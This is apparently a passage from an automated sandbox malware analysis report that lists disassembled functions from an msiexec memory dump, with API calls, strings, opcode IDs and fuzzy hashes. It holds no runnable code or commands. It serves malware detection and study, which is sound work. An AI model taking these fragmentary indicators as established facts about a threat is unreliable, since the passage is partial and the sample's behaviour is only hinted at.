                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                            • API String ID: 1214746602-2708368587
                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                            • memset.MSVCRT ref: 00405E33
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                            • String ID:
                                                                            • API String ID: 2313361498-0
                                                                            • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                            • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                            • String ID:
                                                                            • API String ID: 2047574939-0
                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                            • String ID:
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795

APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
• Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
• Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797

APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
• Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
• Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
• Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
• Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
• Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
• Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
• Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
• Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
• Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
• Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
• Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A

APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
• Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
• Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
• Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
• Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: AttributesErrorFileLastSleep$free
• String ID:
• API String ID: 1470729244-0
• Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
• Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
• Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
• Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
• Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
• Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A

APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
• Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD

APIs
Strings
• <%s>, xrefs: 004100A6
• <?xml version="1.0" ?>, xrefs: 0041007C
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
• Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
• Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
• Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
• Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
• Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
• Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
• Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
• Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
• Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
• Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
• Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
• Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F

APIs
• strlen.MSVCRT ref: 00408DFA
  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
• memset.MSVCRT ref: 00408E46
• memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
• memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
• memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
• memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memsetstrlen
• String ID:
• API String ID: 2350177629-0
• Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
• Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
• Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
• Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
• Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
• Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
• Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B

APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Memory Dump Source
• Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
• Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
• Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
• Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
• Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004116FF
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                            • API String ID: 2618321458-3614832568
                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFilefreememset
                                                                            • String ID:
                                                                            • API String ID: 2507021081-0
                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                            APIs
                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                            • malloc.MSVCRT ref: 00417524
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                            • free.MSVCRT ref: 00417544
                                                                            • free.MSVCRT ref: 00417562
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                            • String ID:
                                                                            • API String ID: 4131324427-0
                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                            • free.MSVCRT ref: 0041822B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PathTemp$free
                                                                            • String ID: %s\etilqs_$etilqs_
                                                                            • API String ID: 924794160-1420421710
                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                            • API String ID: 1775345501-2769808009
                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
